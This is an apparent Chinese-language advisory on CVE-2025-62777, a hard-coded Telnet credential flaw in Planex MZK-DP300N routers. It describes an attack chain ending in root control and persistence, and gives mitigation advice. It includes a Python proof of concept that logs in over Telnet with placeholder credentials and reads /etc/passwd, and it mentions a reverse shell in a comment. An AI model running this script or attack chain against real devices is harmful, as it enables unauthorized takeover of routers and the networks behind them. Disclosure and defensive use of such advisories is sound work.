CVE-2025-62777 MZK-DP300N 硬编码凭证漏洞导致远程命令执行

漏洞信息

漏洞编号

CVE-2025-62777

漏洞类型

硬编码凭证

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MZK-DP300N

漏洞概述

MZK-DP300N是日本Planex公司生产的无线网络路由器设备。该设备在1.07及更早版本中存在严重的安全漏洞，固件中硬编码了后门凭证。攻击者位于本地网络即可利用这些硬编码的默认凭证通过Telnet服务登录设备，绕过正常认证机制。成功利用此漏洞后，攻击者可获得设备的完全控制权，执行任意系统命令，对路由器的配置、流量进行篡改，甚至可能将设备纳入僵尸网络用于进一步攻击。该漏洞无需任何用户交互即可被利用，且攻击复杂度较低，具有极高的实际威胁性。由于路由器通常部署在网络边界位置，此漏洞可能影响到整个内网的安全性。

技术细节

MZK-DP300N路由器固件中嵌入了硬编码的Telnet服务凭证，这些凭证以明文形式存在于固件代码或配置文件中。攻击者通过以下步骤利用此漏洞：首先，攻击者需要接入目标设备所在的本地网络（如通过WiFi未授权连接或ARP欺骗等方式）；然后，使用硬编码的凭证连接设备的Telnet服务（通常监听在23端口）；认证成功后，攻击者即可获得一个具有管理员权限的shell会话。由于固件以root权限运行Telnet服务，攻击者可以在设备上执行任意Linux命令，包括修改防火墙规则、植入后门、监听网络流量或重启设备等操作。这种硬编码凭证问题通常是因为开发人员在产品开发过程中为了调试方便而留下的后门，但在产品发布时未将其移除或更改为随机生成的强密码。

攻击链分析

STEP 1

步骤1

网络接入：攻击者需要接入MZK-DP300N设备所在的本地网络，可以通过WiFi未授权连接、ARP欺骗或连接到同一交换机的受控端口等方式实现

STEP 2

步骤2

端口扫描：攻击者对目标设备进行端口扫描，发现Telnet服务（23端口）处于开放状态

STEP 3

步骤3

凭证利用：使用固件中硬编码的默认凭证尝试登录Telnet服务，绕过正常认证机制

STEP 4

步骤4

命令执行：成功登录后获得具有root权限的shell会话，执行任意系统命令实现对设备的完全控制

STEP 5

步骤5

持久化控制：攻击者可植入后门、修改启动脚本、篡改防火墙规则或部署恶意软件以维持持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-62777 PoC - MZK-DP300N Hard-coded Credentials Exploit
Target: MZK-DP300N < = 1.07
Attack Vector: Telnet with hard-coded credentials
CVSS: 8.8 (High)
"""

import socket
import sys
import time

def exploit_telnet(target_ip, username, password):
    """
    Connect to MZK-DP300N via Telnet using hard-coded credentials
    and execute arbitrary commands.
    """
    try:
        # Connect to Telnet service
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, 23))
        
        # Read initial banner
        banner = sock.recv(1024)
        print(f"[+] Received banner: {banner.decode('utf-8', errors='ignore')}")
        
        # Login process
        time.sleep(1)
        sock.sendall(username.encode() + b'\n')
        time.sleep(0.5)
        sock.sendall(password.encode() + b'\n')
        time.sleep(1)
        
        # Check if login successful
        response = sock.recv(4096)
        print(f"[+] Login response: {response.decode('utf-8', errors='ignore')}")
        
        if b'#' in response or b'$' in response or b'BusyBox' in response:
            print("[+] Login successful! Executing commands...")
            
            # Execute arbitrary command
            cmd = b'cat /etc/passwd\n'
            sock.sendall(cmd)
            time.sleep(1)
            output = sock.recv(4096)
            print(f"[+] Command output:\n{output.decode('utf-8', errors='ignore')}")
            
            # Execute reverse shell or other commands as needed
            return True
        else:
            print("[-] Login failed!")
            return False
            
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False
    finally:
        sock.close()

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2025_62777.py <target_ip>")
        print("Example: python3 cve_2025_62777.py 192.168.1.1")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Hard-coded credentials for MZK-DP300N (to be extracted from firmware)
    # Note: Actual credentials should be extracted from the vulnerable firmware
    hardcoded_user = "admin"  # Example credential
    hardcoded_pass = "password"  # Example credential
    
    print(f"[*] Exploiting CVE-2025-62777 on {target}")
    print(f"[*] Using hard-coded credentials: {hardcoded_user}:{hardcoded_pass}")
    
    exploit_telnet(target, hardcoded_user, hardcoded_pass)

if __name__ == "__main__":
    main()

影响范围

MZK-DP300N <= 1.07

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议立即禁用设备的Telnet服务（通常通过Web管理界面或串口控制台操作），并使用ACL或防火墙规则限制对管理接口的访问，仅允许受信任的管理IP访问。对于必须使用Telnet的场景，可考虑在网络层实施802.1X认证或VLAN隔离，防止未授权设备接入管理网络。同时建议监控网络流量，关注异常的Telnet连接行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-62777
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-62777
3 Details https://www.cvedetails.com/cve/CVE-2025-62777/
4 VulDB https://vuldb.com/cve/CVE-2025-62777
5 Link https://jvn.jp/en/jp/JVN00021602/
6 Link https://www.planex.co.jp/products/mzk-dp300n/